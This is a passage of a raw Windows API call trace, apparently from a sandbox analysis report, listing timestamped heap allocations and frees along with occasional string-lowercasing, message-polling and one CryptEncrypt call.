Size=0x10) returned 0x34aa808 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0257.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.287] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.293] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0257.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.297] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0257.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0257.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 